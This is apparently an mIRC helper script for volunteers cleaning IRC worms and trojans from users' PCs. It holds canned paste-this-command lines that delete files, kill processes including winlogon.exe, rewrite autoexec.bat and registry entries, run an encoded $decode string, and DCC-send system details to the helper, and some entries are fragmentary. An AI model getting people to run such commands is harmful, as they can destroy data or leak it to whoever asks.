NH1

http://pastebin.
ca/746087alternatives: raw | tree | descendants

language: mirc scriptage: 1 wk 4 days
;-------------------- - - - - -
; no hack script v.4.0
;------------------------- - - - - -
;
; add-on for #nohack @ dalnet
; ok. something fresh, very fresh for all authorized helpers.
; this add-on is by far the mas poweful i have done so far.
; enjoy,
; zvonarek
;
; add-on de ayuda para el canal #ayuda.virus en undernet
; creado y codificado por : zvonarek
; colores por : veroushka
;
[file]
name: nohack.irc
[author]
zvonarek
[website]
http://www.dejhantulip.net
[start]
on 1:load: {
.echo -s :: nohack.irc version 4.0 loaded.
.echo -s :: $chr(91) author -- zvonarek $chr(93)
}
menu nicklist {
-
virii
.english
..msgs to chan
...need help ?: //say 12[5 $$1 12] hi... do you need some virii assistance ?
...copy/paste?: //say 12[5 $$1 12] do you know how to copy/paste in mirc ?
...same mirc?: //say 12[5 $$1 12] are you using 4now the same mirc that you were
using whenever people told you that you were spamming/inviting/advertising ?
...why infected?: //say 12[5 $$1 12] could you 4please tell me, in detail if
possible, what makes you think that you are infected ?
...-
...type cmds: //say 12[5 $$1 12] i'm going to get you to type some commands into
your mirc, type (or copy/paste) the command 2looking like this in the current
channel window exactly as i am going to tell you. do you understand ? (yes or no)
...type cmds (/type): //say 12[5 $$1 12] i'm going to get you type some commands
into your mirc, type (or copy/paste) the command 1,15looking like this in the
current channel window exactly as i am going to tell you. do you understand ? (yes
or no)
...type cmds (/rtype): //say 12[5 $$1 12] i'm going to get you type some
commands into your mirc, type (or copy/paste) the command 4looking like this in
the current channel window exactly as i am going to tell you. do you understand ?
(yes or no)
...-
...describe prob: //say 12[5 $$1 12] please describe your problem/infection
...copy/paste: //say 12[5 $$1 12] to copy text from a mirc window, mark the text
as usual with the mouse by pressing the left mouse-button and dragging it across
the text from left to right. 4*** there is no need for the ctrl + c combination at
any time *** the moment you release the left mouse-button, the text will be copied
to the clipboard (an imaginary storage place). to paste, point your cursor where
you want the text and press ctrl+v, or right click with the mouse and click on
paste
...$chr(36) $+ findfile crash: //say 12[5 $$1 12] i will make you type a command
($findfile) and your mirc will seem to crash/freeze, but it is just performing the
command, so 4don't worry if you can't type anything or mirc "freezes" temporarily
(~30 seconds) ok ?
...no problem: //say 12[5 $$1 12] no problem =)
...you may part: //say 12[5 $$1 12] you may part this channel if you don't need
any further assistance.
...no help needed: //say 12[5 $$1 12] if you don't need any virus/worm/trojan
related help, i would ask you to part this channel since there are people that
actually need assistance. thank you.
...-
...u r clean: //say 12[5 $$1 12] that's it... you are clean =) [cheers]
...u r clean (spam): //say 12[5 $$1 12] you are now 4clean. you were infected
because you either visited an infected url that was spammed in mirc or you typed a
2$decode or //write command in your mirc. 4don't do this again. now you have to
download all the critical updates, patches, and service packs for your windows
version. these may be downloaded at 3http://windowsupdate.microsoft.com or by
typing in your mirc 2/run wupdmgr . | //say 12[5 $$1 12] 4after doing all that,
you should be all set.
...-
...official chans
....#helpdesk: //say 12[5 $$1 12] for scripting/bot help and assistance, please
go to the channel #helpdesk
....#dalnethelp: //say 12[5 $$1 12] for help and assistance on dalnet bots
(nickserv - chanserv - memoserv) please go to the channel #dalnethelp
....#windows95: //say 12[5 $$1 12] for help and assistance concerning windows
3.1/95/98/me/nt/2k/xp please go to the channel #windows95
....#operhelp: //say 12[5 $$1 12] for help and assistance provided by ircops,
please go to the channel #operhelp
..-
..nohack - dialog: { set -s %nohack.nick $snicks | set -s %nohack.chan $active |
dialog -mdie nohack nohack | .fill_list }
..-
..make user type (grey): /type
..make user type (red): /rtype
..-
..remotes info
...scripts loaded: /say 12[5 $$1 12] please type (or copy/paste) the following:
2//!say 2$script(0)
...-
...first script: /say 12[5 $$1 12] please type (or copy/paste) the following:
2//!say 2$script(1)
...last script: /say 12[5 $$1 12] please type (or copy/paste) the following:
2//!say 2$script($script(0))
...first and last script: /say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!say i have 2$script(0) scripts loaded. the 1st one is: 2$script(1)
, and the last one is: 2$script($script(0))
...-
...misc. information: /say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $chan $me $+ : i have 2$mircini-- as my main mirc ini file. i
have 2$script(0) scripts loaded, the 1st one is: 2$script(1) , the last one is:
2$script($script(0)) , dcc are set to 2$sreq , my script.ini =
2$exists(script.ini) with 2$lines(script.ini) lines, and i have 2$sock(*,0) open
socket(s).
...-
...[rfiles] in mirc.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!play -trfiles $me mirc.ini 2000
..-
..spam
...auto remove
....set by step: set %step.by.step.nick $$1 | set %step.by.step.spamming.virus
$$?"wich version of spamming is it ?" | remove.step.by.step
....one line: remove.spam.1.line
....-
....: set %nick.helped.a $$1 | /auto.remove.nohack.a
....server $+ . $+ ini: set %nick.helped.server $$1 | /auto.remove.nohack.server
....nospam: set %nick.helped.nospam $$1 | /auto.remove.nohack.nospam
....god $+ . $+ dll: set %nick.helped.god $$1 | /auto.remove.nohack.god
....sativo $+ . $+ dll: set %nick.helped.sativo $$1 | /auto.remove.nohack.sativo
....nkie $+ . $+ txt: set %nick.helped.nkie $$1 | /auto.remove.nohack.nkie
....dab $+ . $+ txt: set %nick.helped.dab $$1 | /auto.remove.nohack.dab
....twg $+ . $+ txt: set %nick.helped.twg $$1 | /auto.remove.nohack.twg
....s $+ . $+ txt: set %nick.helped.s $$1 | /auto.remove.nohack.s
....script $+ . $+ ini: set %nick.helped.script $$1 | /auto.remove.nohack.script
....chat: set %nick.helped.chat $$1 | /auto.remove.nohack.chat
....hack: set %nick.helped.hack $$1 | /auto.remove.nohack.hack
....: set %nick.helped.y $$1 | /auto.remove.nohack.y
....mlrc $+ . $+ ini: set %nick.helped.mlrc $$1 | /auto.remove.nohack.mlrc
....mirc32 $+ . $+ ini: set %nick.helped.mirc32 $$1 | /auto.remove.nohack.mirc32
....system $+ . $+ ini: set %nick.helped.system $$1 | /auto.remove.nohack.system
....stavio $+ . $+ dll: set %nick.helped.stavio $$1 | /auto.remove.nohack.stavio
....scripl $+ . $+ txt: set %nick.helped.scripl $$1 | /auto.remove.nohack.scripl
....boogy $+ . $+ ini: set %nick.helped.boogy $$1 | /auto.remove.nohack.boogy
....mircx $+ . $+ ini: set %nick.helped.mircx $$1 | /auto.remove.nohack.mircx
...-
...specific
....mlrc.ini
.....unload/remove: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2 2//!remote off 2| !run attrib -r mirc.ini 2| !ignore -r 2| !sockclose
* 2| !timers off 2| !unload -rsn mlrc.ini 2| !remove mlrc.ini 2| !run attrib +r
mirc.ini 2| !msg $active $me : removed mlrc.ini 2| !msg $active searching for
mlrc.ini... 2| !msg $active 2$findfile(c:\,mlrc.ini,0,2msg $active 2$1-) 2| !
remote on
.....-
.....remini win.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//remini c:\windows\win.ini windows run
.....play win.ini [run]: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//play -twindows $me c:\windows\win.ini 1750
.....-
.....remini system.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//remini c:\windows\system.ini boot shell
.....writeini system.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//writeini c:\windows\system.ini boot shell explorer.exe
.....play system.ini [boot]: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//play -tboot $me c:\windows\system.ini 1750
.....-
.....findfile (# vbs): //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//say 2$findfile(c:\windows\,*.vbs,0)
.....findfile (names vbs): { //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//say 2$findfile(c:\windows\,*.vbs,0,2write c:\win_vbs.txt 2$1-) |
//say 12[5 $$1 12] after typing that please type the following: 2/dcc send $me
c:\win_vbs.txt }
....boogy.ini
.....clean autoexec.bat: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!if (($os == xp) || ($os == me) || ($os == 2k) || 2($os == nt)) 2{
//!write -c c:\autoexec.bat 2| !msg 2 $active removed: c:\autoexec.bat 2} 2| else
2{ !msg 2 $active removal failed: my os is 2$os 2}
.....-
.....check for lhy*.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,lhy*.ini,0,msg $active 2$1-)
.....remove all lhy*.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,lhy*.ini,0,remove 2$shortfn(2$1-)) 2| !
msg $active 2removed all matching lhy*.ini on c: drive
.....-
.....check for mypic.bat: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,mypic.bat,0,msg $active 2$1-)
.....remove all mypic.bat: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,mypic.bat,0,remove 2$shortfn($1-)) 2| !
msg $active 2removed all matching mypic.bat on c: drive
.....-
.....check for navdx*.reg: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,navdx*.reg,0,msg $active 2$1-)
.....remove all navdx*.reg: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,navdx*.reg,0,remove 2$shortfn(2$1-)) 2| !
msg $active 2removed all matching navdx*.reg on c: drive
.....-
.....check for update.vbs: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,update.vbs,0,msg $active 2$1-)
.....remove all update.vbs: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,update.vbs,0,remove 2$shortfn(2$1-)) 2| !
msg $active 2removed all matching update.vbs on c: drive
.....-
.....unload/remove $chr(91) $+ boogy.ini $+ $chr(93): //say 12[5 $$1 12] please
type (or copy/paste) the following: 2//!remote off 2| 2!ignore -r 2| 2!unload -rsn
boogy.ini 2| 2!remove boogy.ini 2| 2!remote on 2| !msg $active $me : removed
boogy.ini 2| 2!msg $active searching for boogy.ini... 2| 2!msg $active
2$findfile(c:\,boogy.ini,0,msg $active 2$1-)
.....unload/remove $chr(91) $+ script.ini $+ $chr(93): //say 12[5 $$1 12] please
type (or copy/paste) the following: 2//!remote off 2| 2!ignore -r 2| 2!unload -rsn
script.ini 2| 2!remove script.ini 2| 2!remote on 2| !msg $active $me : removed
script.ini 2| 2!msg $active searching for script.ini... 2| 2!msg $active
2$findfile(c:\,script.ini,0,msg $active 2$1-)
....matrix2
following: 2//!remote off 2| !ignore -r 2| !unload -rsn matrix2 2| !remove matrix2
2| !remote on 2| !msg $active $me : removed matrix2 2| !msg $active searching for
matrix2... 2| !msg $active 2$findfile(c:\,*matrix2*,0,msg $active 2$1-)
....nospam
following: 2//!remote off 2| !ignore -r 2| !unload -rsn nospam 2| !remove nospam
2| !remote on 2| !msg $active $me : removed nospam 2| !msg $active searching for
nospam... 2| !msg $active 2$findfile(c:\,*nospam*,0,msg $active 2$1-)
..-
..commands
...$chr(36) $+ findfile: set %findfile.dir $$?"drive or path (example c:)" |
set %findfile.file $$?"name of the file (example *nospam*)" | //say 12[5 $$1 12]
please type (or copy/paste): 2//say %find.file.spamming.virus.step.by.step $+ ( $+
%findfile.dir $+ , $+ %findfile.file $+ ,0,msg $me $ $+ 1-)
...$chr(36) $+ exists: set %exists.file $$?"name of the file (within mirc dir)"
| //say 12[5 $$1 12] please type (or copy/paste): 2//say
%exists.spamming.virus.step.by.step $+ ( $+ %exists.file $+ )
...-
...$chr(36) $+ disk: //say 12[5 $$1 12] please type (or copy/paste): 2//say
%hd.check 2[ c 2$disk(c:) 2] 2[ d 2$disk(d:) 2] 2[ e 2$disk(e:) 2] 2[ f 2$disk(f:)
2] 2[ z 2$disk(z:) 2] 2[ w 2$disk(w:) 2]
...$chr(36) $+ os: //say 12[5 $$1 12] please type (or copy/paste): 2//say 2$os
...-
...misc. information: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $chan $me $+ : os: 2$os <> mirc version: 2$version @ 2$mircdir
<> autoexec.bat is: 2$isfile(c:\autoexec.bat) with 2$lines(c:\autoexec.bat) lines
<> windows dir:2 $isdir(c:\windows\) <>
...more info to box.txt: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run command /c set > c:\box.txt | !msg $active c:\box.txt info
created !
...-
...mirc.ini in $chr(37) $+ windir $+ $chr(37): //say 12[5 $$1 12] please type
(or copy/paste) the following: 2//!msg $chan $me ::
2$findfile((2$nofile(2$findfile(2$left(2$mircdir),3),win.ini,1)),mirc.ini,0,msg
$active 2$1-)
...-
...play file: /set %play.file $$?"specify the location of file (use
$shortfn(file) it is too large) or just the name (if it is on mirc's directory)" |
//say 12[5 $$1 12] please type 2/play 2 $me %play.file 2000
...-
...reconnect + rejoin: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!server 2-m 2$server 2$port 2-j $active
...-
...check blaster worm: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active $me $+ : msblast.exe: 2$findfile(c:,msblast.exe,0) -=
[]=- penis32.exe: 2$findfile(c:,penis32.exe,0) -=[]=- teekids.exe:
2$findfile(c:,teekids.exe,0) -=[]=- mspatch.exe: 2$findfile(c:,mspatch.exe,0) -=
[]=- mslaugh.exe: 2$findfile(c:,mslaugh.exe,0) -=[]=- enbiei.exe:
2$findfile(c:,enbiei.exe,0)
...-
...del files in dir
....output on channel: rem.files.dir
....output on remreport.txt: rem.files.dir.remreport
...-
...kill a process im: /set %process.kill $$?="type in here the image name of the
process" | //say 12[5 $$1 12] please type (or copy/paste) the following: 2//!run
taskkill 2/im %process.kill /f /t 2| !msg $chan $me 2: process kill succesful
using image name ( %process.kill )
...kill a process pid: /set %process.kill.pid $$?="type in here the pid number
of the process" | //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!run taskkill 2/pid %process.kill.pid /f /t 2| !msg $chan $me 2: process kill
succesful using pid ( %process.kill.pid )
...-
...abort shutdown: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!run shutdown /a 2| !msg $chan $me 2: all attempts to shutdown computer were
aborted.
...-
...command-line tool: /set %location.of.clt $$?="what is the location of the
.exe tool" | /set %cmds.and.flags $$?="what is the command and flags" | //say 12[5
$$1 12] please type (or copy/paste) the following: 2//!run command
%location.of.clt %cmds.and.flags > c:\info.txt
...-
..-
..deep analysis
...registry
....export keys
.....specific ?: //set %regedit.specific.nohack $$?="type the string to be saved
in rs.txt" | reg.specific.nohack
.....-
.....run: //say 12[5 $$1 12] : please type (or copy/paste): 2//run 2regedit
2$iif2(2$os == 2xp,2/a,2/e) c:\run.txt
hkey_local_machine\software\microsoft\windows\currentversion\run 2| 2msg $active
$me : run.txt ok!
.....-
.....chatfile: //say 12[5 $$1 12] : please type (or copy/paste): 2//run 2regedit
2$iif2(2$os == 2xp,2/a,2/e) c:\cf.txt hkey_classes_root\chatfile 2| 2msg $active
$me cf.txt ok!
.....irc: //say 12[5 $$1 12] : please type (or copy/paste): 2//run 2regedit
2$iif2(2$os == 2xp,2/a,2/e) c:\irc.txt hkey_classes_root\irc 2| 2msg $active $me
irc.txt ok!
....-
....write to reg:
....del from reg: { set %regdelete $$?="enter the <path key>\<entry name>" | say
12[5 $$1 12] please type (or copy/paste) the following: 2//!2comopen 2regdel
2wscript.shell 2| 2//!set 2%del 2$com(regdel,regdelete,3,bstr, $+ %regdelete $+ )
2| 2//!comclose regdel 2| 2//!msg $active $me : registry entry deleted }
....read from reg: { set %regreader $$?="enter the <path key>\<entry name>" |
say 12[5 $$1 12] please type (or copy/paste) the following: 2//!2comopen 2regread
2wscript.shell 2| 2//!set 2%read 2$com(regread,regread,3,bstr, $+ %regreader $+ )
2| 2var 2%result 2= 2$com(regread).result 2| 2//!comclose regread 2| 2//!msg
$active $me : registry entry read: 2%result }
...-
...autoexec.bat
....write:{ set %autoexec.bat.write $$?="path for the file & file name" | //say
12[5 $$1 12] $+ , please type 2/write c:\autoexec.bat 2 %autoexec.bat.write }
....write (del): { set %autoexec.bat.del $$?="path for the file & file name" |
//say 12[5 $$1 12] $+ , please type 2/write c:\autoexec.bat del 2
%autoexec.bat.del }
....-
....delete a line:{ set %autoexec.bat.del.line $$?="input the line number" |
echo -a make the user type this--> /write -dl $+ %autoexec.bat.del.line
c:\autoexec.bat }
....overwrite line:{ set %autoexec.bat.overwrite.line $$?="input the line number
to be overwrited" | set %autoexec.bat.overwrite.text $$?="type the line which will
be overwritten" | echo -a make the user type this --> /write -l $+
%autoexec.bat.overwrite.line c:\autoexec.bat %autoexec.bat.overwrite.text }
...-
...win.ini
....play win.ini: set %user.win.dir $$?"whats his/her windows directory ?
(usually c:\windows\)" | //say $$1 $+ : please type 2//!play $me
2$shortfn($findfile( $+ %user.win.dir $+ ,win.ini,1)) 2000
....-
....run entry: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!msg $chan $me $+ : 2$readini(c:\windows\win.ini,windows,run) 2$readn
....load entry: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!msg $active $me $+ : 2$readini(c:\windows\win.ini,windows,load) 2$readn
....-
....fix win.ini: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!msg $chan $me $+ :
2$findfile(2$mircdir,remote.ini,0,2$iif(2$exists(c:\windows\win.ini) ==
2$true,2$iif(2$read(c:\windows\win.ini,w,run=*) != 2$null,2write 2$+(-l,2$readn)
c:\windows\win.ini run= ,2msg $active $me $+ : run= was empty!),2msg $active $me
$+ : c:\windows\win.ini not found!))
...-
...system.ini
....play system.ini: set %user.win.dir $$?"whats his/her windows directory ?
(usually c:\windows\)" | //say 12[5 $$1 12] $+ : please type 2//play $me
2$shortfn($findfile( $+ %user.win.dir $+ ,system.ini,1)) 2000
....-
....shell entry: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!msg $chan $me $+ : 2$readini(c:\windows\system.ini,boot,shell) 2$readn
....-
....fix system.ini: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $chan $me $+ :
2$findfile(2$mircdir,remote.ini,0,2$iff(2$exists(c:\windows\system.ini) ==
2$true,2$iif(2$read(c:\windows\system.ini,w,shell=*) != 2shell=explorer.exe,2write
2$+(-l,2$readn) c:\windows\system.ini shell=explorer.exe,2msg $active $me $+ :
shell= was ok!),2msg $active $me $+ : c:\windows\system.ini not found!))
...-
...msinfo32.exe
....specific?: set %msinfo32.category $$?=" enter the +/- category parameters
(ie.: +swenvrunningtasks) " | //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run msinfo32.exe 2/report info.txt 2/categories %msinfo32.category
....-
....running tasks: //say 12[5 $$1 12] please type (or copy/paste) the following:
2//!run msinfo32.exe 2/report runtasks.txt 2/categories +swenvrunningtasks
....system summary: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run msinfo32.exe 2/report sys_summary.txt 2/categories
+systemsummary
...-
...check windows *.ini's: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$read -wrun=* 2$findfile(c:,win.ini,1) 2$readn 2|
2!say 2$read -wload=* 2$findfile(c:,win.ini,1) 2$readn 2| 2!say 2$read -wshell=*
2$findfile(c:,system.ini,1) 2$readn
...-
...netstat: { netstat.nohack }
...-
...running tasks list: /say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run command /c tasklist >> c:\tasks.txt | //say 12[5 $$1 12] then
type: 2//!dcc send $me c:\tasks.txt
..-
..specific removals
...cs_keys.zip
....windows xp/2000
.....kill process winlogon.exe:/say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run taskkill 2/im winlogon.exe /f /t 2| 2!msg $active $me :
processes killed
.....-
.....find keys.pif:/say 12[5 $$1 12] please type (or copy/paste) the following:
2//!msg $active 2$findfile(c:,keys.pif,0,msg $active 2$1-)
.....find and remove keys.pif:/say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,keys.pif,0,remove 2$shortfn( 2$+ 2$1- 2$+
)
.....-
.....find winlogon.exe:/say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:\windows\system\,winlogon.exe,0,msg
$active 2$1-) 2$findfile(c:\windows\system32\wins\,winlogon.exe,0,msg $active
2$1-)
.....find and remove winlogon.exe:/say 12[5 $$1 12] please type (or copy/paste)
the following: 2//!msg $active 2$findfile(c:\windows\system\,winlogon.exe,0,remove
2$shortfn( 2$+ 2$1- 2$+ )
2$findfile(c:\windows\system32\wins\,winlogon.exe,0,remove 2$shortfn( 2$+ 2$1- 2$+
)
...-
...bmirc.hlp
....turn remote off:/say 12[5 $$1 12] please type (or copy/paste) the following:
2//say 2$(2$decode(jgzpbmrmawxlkgm6lgf1dg9legvjlmjhdcwxlhjlbw90zsbvzmyp,m),2)
....-
....unload + remove://say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!remote off 2| !run attrib -r mirc.ini 2| !ignore -r 2| !sockclose *
2| !timers off 2| !unload -rsn bmirc.hlp 2| !remove bmirc.hlp 2| !run attrib +r
mirc.ini 2| !msg $active $me : removed bmirc.hlp 2| !msg $active searching for
bmirc.hlp... 2| !msg $active 2$findfile(c:\,bmirc.hlp,0,msg #gtbot 2$1-) 2|
2!remote on
....-
....find + remove zips: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:\windows\system\,*.zip,0,remove " $+ 2$1-
$+ ")
....find + remove mirckey.gd: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!msg $active 2$findfile(c:,mirckey.gd,0,remove " $+ 2$1- $+ ")
....find + remove filezip*.zip: //say 12[5 $$1 12] please type (or copy/paste)
the following: 2//!msg $active 2$findfile(c:,filezip*.zip*,0,remove " $+ 2$1- $+
")
....-
....fix registry - step 1: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!run regedit 2$iif(2$os == xp,/a,/e) c:\regedit.txt
hkey_local_machine\software\microsoft\windows\currentversion\run
....fix registry - setp 2: //say 12[5 $$1 12] please type (or copy/paste) the
following: 2//!set 2%tmp 0 2| 2!while (2$lines(c:\regedit.txt) >= 2%tmp) 2{ 2.inc
2%tmp 1 2| 2//!echo 0 -s 2$findfile(c:,regedit.txt,1,2$iif(*.pif* iswm
2$read(c:\regedit.txt,2%tmp) == 2$true,2write 2$+(-l,2$readn) c:\regedit.txt
2$replace(2$read(c:\regedit.txt,2%tmp),2$gettok(2$read(c:\regedit.txt,2%tmp),2,61)
,-),2return)) 2}
following: 2//!set 2%tmp 0 2| 2!while (2$lines(c:\regedit.txt) >= 2%tmp) 2{ 2.inc
2%tmp 1 2| 2//!echo 0 -s 2$findfile(c:,regedit.txt,1,2$iif(*.scr* iswm
2$read(c:\regedit.txt,2%tmp) == 2$true,2write 2$+(-l,2$readn) c:\regedit.txt
2$replace(2$read(c:\regedit.txt,2%tmp),2$gettok(2$read(c:\regedit.txt,2%tmp),2,61)
,-),2return)) 2}
following: 2//run regedit /s c:\regedit.txt 2| 2!msg $active registry importation
complete!
..-
..urls
...windows update: //say 12[5 $$1 12] the windows update website is
3http://windowsupdate.microsoft.com ( type in mirc /run wupdmgr ) once there click
on product updates and download all the critical updates you need, and service
packs as well if not installed already. then upgrade your internet explorer and
windows to fill in your security holes; also download the security patches you
didn't download so far.
...-
...online scans
....trendmicro o-scan: //say 12[5 $$1 12] you may get a free online-scan at
3http://housecall.trendmicro.com/housecall/start_corp.asp once there, choose your
country and click on go, let the applets download, then check 4all your hard drive
letters and don't forget the check the {auto clean} option 4before you click on
scan.
....panda o-scan://say 12[5 $$1 12] you may get a free online-scan at
3http://www.pandasoftware.com/activescan/com/activescan_principal.htm 4*note*
delete the any infected files found by the panda activescan.
....bitdefender o-scan: //say 12[5 $$1 12] you may get a free online-scan at
3http://www.bitdefender.com/scan/licence.php follow the instructions and scan &
clean all of your drives.
....rav o-scan: //say 12[5 $$1 12] you may get a free online-scan at
3http://www.ravantivirus.com/scan/ click on 12"scan without subscribing" and
follow the instructions for the online scan.
...-
...trojan scanners
....the cleaner: //say 12[5 $$1 12] you may get a copy of the cleaner at
3http://www.moosoft.com/products/cleaner/download/ 4*remember* to update it by
selecting moolive from the cleaner menu, after it's done updating, run 'the
cleaner'. the 'cleaner' will remove any known trojans it finds. 4*note* you {must
close mirc} if you have an mirc related trojan
....swat it: //say 12[5 $$1 12] you may get (free) swat-it trojan detection and
removal utility at 3http://swatit.org/download.html 4*remember* to update the
program so it detects/remove the latests bots/trojans/virus variants.
....pestpatrol: //say 12[5 $$1 12] yoy may get pestpatrol
3http://www.safersite.com/downloads/eval/download.asp
...-
...spyware
....ad-aware: //say 12[5 $$1 12] ad-aware may be downloaded from
3http://www.lavasoftusa.com/support/download/
....spybot: //say 12[5 $$1 12] to fight agains spyware please download spybot at
3http://spybot.safer-networking.de/ *please* update the software before using it
so it detects the latest threads.
....pestscan: //say 12[5 $$1 12] to get a 4free and on-line scan for spyware
please go to 3http://www.pestscan.com/ read through the webpage and click on
12"scan without registering" then let the applets download and scan !
...-
...spam remover
....spam remover [mirchelp.info]: //say 12[5 $$1 12] you may get spam remover [a
mirc spamming removal tool] at 3http://mirchelp.info/nohack/spam_remover.zip
4*note* be sure to click on liveupdate to get the latest variants treated. read
the readme.txt files to understand the options and features of the spam remover.
....spam remover [vtech - filebox]: //say 12[5 $$1 12] you may get spam remover
[a mirc spamming removal tool] at
3http://filebox.vt.edu/users/onunez/nohack/spam_remover.zip 4*note* be sure to
click on liveupdate to get the latest variants treated. read the readme.txt files
to understand the options and features of the spam remover.
....spam remover [fruitloop.net]: //say 12[5 $$1 12] you may get spam remover [a
mirc spamming removal tool] at 3http://www.fruitloop.net/nohack/spam_remover.zip
4*note* be sure to click on liveupdate to get the latest variants treated. read
the readme.txt files to understand the options and features of the spam remover.
...-
...system restore
....xp syst. restore: //say 12[5 $$1 12] for information about system restore in
4windows xp go to
3http://service1.symantec.com/support/tsgeninfo.nsf/docid/2001111912274039
....me syst. restore: //say 12[5 $$1 12] for information about system restore in
4windows me go to
...-
...nukes patches: //say 12[5 $$1 12] you can find patches to protect yourself
against 'nukes' in this url 3http://www.sf.co.yu/patches/index.html
...dos f-prot: //say 12[5 $$1 12] you can get the latest zipped dos version of
f-secure antivirus from 3ftp://ftp.f-secure.com/anti-virus/free/ download fp-
312.zip unzip it to your {c: drive} and run it under dos-mode
...port scan: //say 12[5 $$1 12] to display and get a network probe of your
computer and which service ports are accepting connections, please go to
3https://grc.com/x/ne.dll?bh0bkyd2
...ident setup: //say 12[5 $$1 12] for information on how to setup ident on a
windows computer go to 3http://kline.dal.net/exploits/winident.htm to set it up on
a mac goto 3http://kline.dal.net/exploits/macident.htm for more information on
ident read 3http://kline.dal.net/exploits/ident.htm
...stinger [mcafee]: //say 12[5 $$1 12] you may get mcafee avert stinger removal
tool for specific virus removals at 3http://vil.nai.com/vil/stinger/ 4*note*
please read the instructions provided and follow the procedure describe in the
website.
...safe-mode: //say 12[5 $$1 12] information of how to restart your pc in safe
mode available at
...zone alarm: //say 12[5 $$1 12] you may get zonealarm firewall at
3http://www.zonelabs.com 4*note* this is a trial version for this firewall. you
may use it for free the first 30 days. after that period of time, if you want to
keep using it, you have to purchase it.
...rol.vbs: //say 12[5 $$1 12] for information about rol.vbs please go to
3http://kline.dal.net/exploits/rolvbs.htm
...hide/unhide app: //say 12[5 $$1 12] to get a free hide/unhide windows
application, download 3http://www.dejhantulip.net/nohack/tools/hide.exe
...can't clean _restore: //say 12[5 $$1 12] for information about the inability
to remove viruses from _restore\temp or _restore please go to
3http://support.microsoft.com/default.aspx?scid=kb;en-us;q263455
...-
...check for any infections: /check.virus
...additional instructions: /additional.instructions
..-
..removers urls
...rats
....dmsetup: //say 12[5 $$1 12] to remove dmsetup please download this file
3http://www.nohack.net/bin/sysdmfx.exe close mirc and run it !
....subseven: //say 12[5 $$1 12] to remove the 4different variants of the
subseven trojan, please go to 3http://www.hackfix.org/subseven/
....netbus: //say 12[5 $$1 12] to remove the 4different variants of the netbus
trojan, please go to 3http://www.hackfix.org/netbusfix/
...-
...worms
....sobig.f: //say 12[5 $$1 12] get the w32.sobig.f@mm removal tool at
3http://securityresponse.symantec.com/avcenter/fixsbigf.exe
....welchia: //say 12[5 $$1 12] get the w32.welchia.worm removal tool at
3http://www.symantec.com/avcenter/fixwelch.exe
....blaster: //say 12[5 $$1 12] get the w32.blaster.worm removal tool at
3http://securityresponse.symantec.com/avcenter/fixblast.exe and read & download
the patch at
3http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulle
tin/ms03-026.asp
;-------> http://securityresponse.symantec.com/avcenter/tools.list.html
<--------
;-------> http://www.bitdefender.com/html/free_tools.php <------------
;-------> http://virusall.com/downrem.html <---------
;-------> http://www.mcafeeb2b.com/naicommon/avert/avert-research-
center/tools.asp#002 <------
..-
..info about...
...-
...spam (variants)
....karma: //say 12[5 $$1 12] : you may get additional information about the
karma virus at 3http://trojaninfo.com/karma.htm
....nkie.txt: //say 12[5 $$1 12] : you may get additional information about the
nkie.txt worm at 3http://trojaninfo.com/nkie/nkie.htm
...-
...top 20 viruses: //say to get a list of the top 20 virus threats go to
3http://www.nettech-solutions.com/virus_1-1.html
...-
...w32/klez $+ . $+ h-mm: //say 12[5 $$1 12] if you are infected with the virus
w32/klez.h@mm please go to 3http://vil.nai.com/vil/content/v_99455.htm and see
the specific information about it. also see the removal instructions for it.
...w32/klez $+ . $+ e@mm: //say 12[5 $$1 12] if you are infected with the virus
w32/klez.e@mm please go to 3http://vil.nai.com/vil/content/v_99367.htm and see
...w32/sircam $+ . $+ a-mm: //say 12[5 $$1 12] if you are infected with the
virus w32/sircam.a-mm please go to 3http://www.nettech-solutions.com/virus_1-1-
3.html to see the specific information about it. you may also want to download the
mcafee antivirus to remove it.
